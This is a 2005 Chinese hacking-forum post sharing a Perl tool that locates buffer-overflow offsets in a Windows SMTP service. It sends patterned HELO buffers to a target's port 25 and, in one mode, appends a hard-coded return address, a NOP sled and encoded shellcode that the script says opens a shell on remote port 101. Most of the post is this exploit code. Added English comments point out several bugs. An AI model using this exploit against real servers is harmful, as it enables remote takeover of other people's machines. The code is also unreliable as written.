发表于 2005-8-1 18:45
[原创]溢出点定位工具
文章作者:无敌最寂寞 [E.S.T](孟方明 -273℃)
信息来源:邪恶八进制信息安全团队( www.eviloctal.com)
附带在《菜鸟溢出手册》里的,感觉也许对某些朋友能有用我就贴出来了:
#!/usr/bin/perl
#溢出点定位工具 by 孟方明[-273℃]
# Command-line driver.  Positional @ARGV layout as actually read below:
#   0 host  1 port  2 times  3 rep1  4 rep2  5 rep3  6 ret  7 loc  8 adds  9 p
# (usage() prints <adds> in fourth position, which does not match this order.)
$|=1;
use IO::Socket;
# Base pattern: nine runs of four identical digits.  cvt() rewrites those
# runs into small counters so a value seen in a crash can be mapped back to
# an offset inside the buffer.
my $str="111122223333444455556666777788889999";
my $buff;
my %opts;                        # declared, never used
# Fewer than two arguments: usage() prints help and exits.
if($#ARGV<1)
{
&usage;
}
#exit(0);
# '||' binds tighter than '=', so each of these is $x = ($ARGV[n] || die ...);
# an argument given as "0" is rejected exactly like a missing one.
my $host=$ARGV[0] || die "you must specified the target with ip address!\n";
my $port=$ARGV[1] || die "you must specified target port\n";
my $times=$ARGV[2] || die "you must specify the repeate times!\n";
my $rep1=$ARGV[3] ;
my $rep2=$ARGV[4];
my $rep3=$ARGV[5];
my $ret=$ARGV[6] || 0;
my $loc=$ARGV[7]|| 0;
my $adds=$ARGV[8] ||0;
my $pr=$ARGV[9] || 0;
# 'p' mode: print the generated buffer and its length, send nothing, exit.
# This is the only call site that hands cvt() all six of its parameters;
# cvt() runs twice here, so temp.txt is written twice.
if (lc($pr) eq 'p')
{print "\t the buffer to filled are below:\n";
print '#' x 80,"\n\n";
print &cvt($str,$times,$adds,$rep1,$rep2,$rep3);
print "\n",'#' x 80,"\n\n";
my $len=length(&cvt($str,$times,$adds,$rep1,$rep2,$rep3));
print "the length of the buffer is $len\n";
exit(0);
}
# No replacement digits: send the plain repeated pattern built by first().
# Numeric '==' treats an undef $rep as 0 (warning only if warnings were on).
if($rep1==0&&$rep2==0&&$rep3==0)
{
print "[+]Now trying $times times chars to fill the buffer!\n";
&attack(&first($str,$times),$host,$port);
# NOTE(review): 'return' in mainline code is a fatal "Can't return outside a
# subroutine" error; the script ends with that message after attack() has
# already finished.  The same applies to the 'return' in the next branch.
return;
}
# ret and loc both non-zero: cut the buffer at $loc and append mkshell()'s
# fixed tail, then send.  $ret only gates this branch -- mkshell() unpacks it
# but never uses it.  cvt() receives five values here, so inside cvt() $adds
# takes $rep1, $rep1 takes $rep2, $rep2 takes $rep3 and $rep3 is undef --
# unlike the six-argument call in the 'p' branch above.
if($ret!=0 && $loc!=0)
{
print "[+]Now making shellcode with ret specified!\n";
sleep 2;
$buff=&mkshell(&cvt($str,$times,$rep1,$rep2,$rep3),$ret,$loc);
print "[+]Now attack with produced shellcode!\n";
&attack($buff,$host,$port);
print "[+]Done!!Check your shell on remote port 101!\n";
return;
}
# Default: send the converted pattern (same five-argument cvt() call as above).
print "[+]Now producing wanted buffer!\n";
$buff=&cvt($str,$times,$rep1,$rep2,$rep3);
sleep 2;
print "[+] Now attack with produced buffer!\n";
&attack($buff,$host,$port);
print "[+]attack completed!\n";
# Build the first-pass probe: a single leading 'a' followed by the base
# pattern repeated $times times.  Returns the assembled string.
sub first
{
    my ($pattern, $count) = @_;
    return 'a' . ($pattern x $count);
}
# Rewrite the repeated pattern so that runs of four identical digits become
# cycling counters (1..9), one run per pass, so a value observed later can be
# mapped back to a line and offset in the buffer.
# Arguments: $str base pattern, $times repeat count, $adds number of leading
# 'a' padding characters (0 = none), $rep1..$rep3 the digit to replace in
# each of up to three passes (0 = pass disabled).
# Returns the rebuilt buffer; the result always begins with a single 'a'.
# Side effect: writes and re-reads "temp.txt" in the current working
# directory and leaves it there -- an on-disk artifact of every run.
sub cvt
{
my ($str,$times,$adds,$rep1,$rep2,$rep3)=@_;
$str.="\n";                      # one newline per repetition: each becomes one line of @buffer
my $buf;
if($adds!=0)
{$buf='a' x $adds;}
$buf.=$str x $times;
my $num=1;                       # counter for the $rep1 pass
my $n=1;                         # counter for the $rep2 pass
my $nn=1;                        # counter for the $rep3 pass
# Round trip through a file purely to split $buf into lines.  Two-argument
# open on a bareword handle with no result check: a failed open is silent
# and @buffer is then simply empty.
open(TEMP,">temp.txt");
print TEMP $buf;
undef($buf);
close TEMP;
open(TEMP,"<temp.txt");
my @buffer=<TEMP>;
close TEMP;
my $buf='a';                     # re-declares $buf in the same scope; output starts with 'a'
foreach(@buffer)
{ chomp($_);
# Pass 1: every character that is not the $rep1 digit becomes 'a'; the first
# run of four $rep1 digits becomes the current counter written four times.
# In a pattern Perl reads "$rep1{4}" as $rep1 followed by the {4} quantifier,
# not as a hash element.
s/[^$rep1]/a/g;
s/$rep1{4}/$num x 4/e;
# Pass 2 only runs on lines that still contain the $rep2 digit; after pass 1
# the only digits left on a line are the four counter digits just written.
# NOTE(review): five-argument callers leave $rep3 undef (and shift the other
# values); what the patterns below do with an undef value is not defined by
# this code -- an empty pattern in Perl reuses the last successful match.
if($_=~/$rep2/)
{
s/$rep2{4}/$n x 4/e;
$n++;
$n=1 if($n >9);
if($_=~/$rep3/)
{
s/$rep3{4}/$nn x 4/e;
$nn++;
$nn=1 if ($nn > 9);
}
elsif($rep3!=0)
{s/\d/a/g;}                      # pass 3 requested but no match: blank every digit
}
elsif($rep2!=0)
{s/\d/a/g;}                      # pass 2 requested but no match: blank every digit
$num++;
$num=1 if ($num >9);             # counters cycle 1..9, so values repeat every nine lines
$buf.=$_;
}
undef $buffer;                   # $buffer (scalar) is not @buffer; without strict this is a no-op
return $buf;
}
# Open a TCP connection and send $buf as the argument of an SMTP HELO line.
# Arguments: $buf the payload, $host the peer address, $port -- accepted but
# unused: PeerPort is the literal 25, so the connection always goes to 25.
# Prints the server's first line, the payload and the server's reply;
# returns nothing useful.
# The connect result is not checked: if ->new returns undef, the autoflush
# call dies with "Can't call method ... on an undefined value".
# On the receiving side this appears as a single HELO whose argument is a
# long run of 'a' and digit quads, which is straightforward to flag in SMTP
# logs or with a length rule on the HELO argument.
sub attack
{ my ($buf,$host,$port)=@_;
my $sock=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>25,Proto=>'tcp');
$sock->autoflush(1);
my $res=<$sock>;                 # one line: the server greeting, if any
print $res,"\n";
print "buffer sent are:\n";
print $buf,"\n";
print "now sending...\n";
print $sock "HELO $buf\r\n";
$res=<$sock>;                    # one reply line; blocks until the peer answers or closes
print $res;
close $sock;
}
# Cut $buf at the first occurrence of $subs and append a fixed tail: four
# literal bytes, 32 bytes of 0x90, then the embedded byte string.
# Arguments: $buf the cvt() output, $ret -- unpacked but never used (the four
# bytes appended are the constant below, not $ret), $subs the marker to
# locate (the driver passes $loc).  Returns the assembled string.
# If $subs is not found, index() returns -1 and substr($buf,0,-1) keeps all
# of $buf except its last character; the tail is appended regardless.
# The code does not say what the byte string does; the driver's message
# printed after sending it claims a listener on remote port 101.
sub mkshell
{
my ($buf,$ret,$subs)=@_;
my $pos=index($buf,$subs);
my $shell=substr($buf,0,$pos);
$shell.="\x29\x4c\xdf\x77";      # hard-coded 4-byte value; $ret is ignored
$shell.="\x90" x 32;             # 32 bytes of 0x90
my $shellcode="\xEB".
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF".
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D".
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9".
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C".
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89".
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03".
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F".
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88".
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61".
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9".
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C".
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8".
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68".
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F".
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23".
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89".
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9".
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77".
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77".
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77".
"\x58\x68\x61\x63\x6B\x90";
$shell.=$shellcode;
return $shell;
}
# Print the help text and exit with status 0.  The argument order shown in
# the text (<adds> fourth) does not match the driver, which reads rep1..rep3
# from $ARGV[3..5] and adds from $ARGV[8].
sub usage
{
print<<"END";
windows溢出点定位工具 by 孟方明[-273℃]
usage:
locate.pl <host> <port> <times> <adds> <rep1> <rep2> <rep3> <ret<loc>> [p]
host======>目标主机IP地址(必选项)
port======>目标端口(必选项)
times=====>重复次数(必选项)
adds======>需要后推多少个字符(1-3)没有填0
rep1======>第一次替换数字(没有填0)
rep2======>第二次替换数字(同上)
rep3======>第三次替换数字(同上)
ret=======>指定返回地址(默认填0)
loc=======>指定最终产生的buffer的定位点(如果指定了ret,则此项必须指定且不能为0)
p ========>是否打印出测试buffer来(只打印,但不攻击)
说明:如有不理解的可以参看我在黑客X档案12期发表的《菜鸟也能写exploit》
email:superlone@qq.com
web:http://www.hackerxfiles.net
home:[url]http://www.eviloctal.com[url]
END
exit(0)
}
当时为了配合稿子,所以写得很仓促难免有错误,还请大家多多指正了。
PS:有些代码还是用论坛的“[ QUOTE]”标签作为引用看得舒服,用“ [ CODE]”标签就那么一个小框框看上去好别扭的。